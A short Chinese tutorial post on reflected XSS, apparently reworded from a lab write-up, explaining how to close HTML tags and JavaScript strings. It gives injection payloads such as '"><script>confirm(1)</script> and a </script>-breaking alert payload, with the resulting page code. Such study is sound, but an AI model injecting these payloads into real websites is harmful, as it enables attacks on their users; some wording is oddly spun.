Web渗出测试之XSS跨站脚本之JS输出 以及 什么是闭合标签 一篇文章给你说明
目录闭合标签
XSS之js输出
https://i-blog.csdnimg.cn/direct/be58eea460724be8a74913839b1903cf.png
闭合标签
[*] 封闭标签 达到 让标签值不当成 一个属性值来展示 从而达到xss注入的效果
[*] '"> 为了想办法闭合前面的标签,不用也行成功率高一些
攻击方法 '"><script>confirm(1)</script>,
[*] 其中 '"> 我们称之为完成闭合符号,后面跟script标签来进行攻击,弹出了窗口表现我们的js代码被实行了。
[*]触发JS代码 天生XSS攻击
XSS之js输出
这个方式照旧需要采用闭合的方式来进行利用 引号 闭合</script>
'</script><script>alert('this is my order')</script>>
[*] <em>也就是在页面上输出 输出到js代码页面中去了 在js代码中执行</em>
[*] 查看页面源代码在查看js代码实行
[*] 把前面的闭合 后面构造自己的js
<script> $ms=''</script><script>alert('this is my order')</script>>'; if($ms.length != 0){ if($ms == 'tmac'){ $('#fromjs').text('tmac确实厉害,看那小眼神..') }else {// alert($ms); $('#fromjs').text('无论如何不要放弃心中所爱..') } } https://i-blog.csdnimg.cn/direct/7af3427cc4d84b519ac8ae1bfde67e3b.png
https://i-blog.csdnimg.cn/direct/312110f1f2564af2ac90a8c05a532be7.png
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]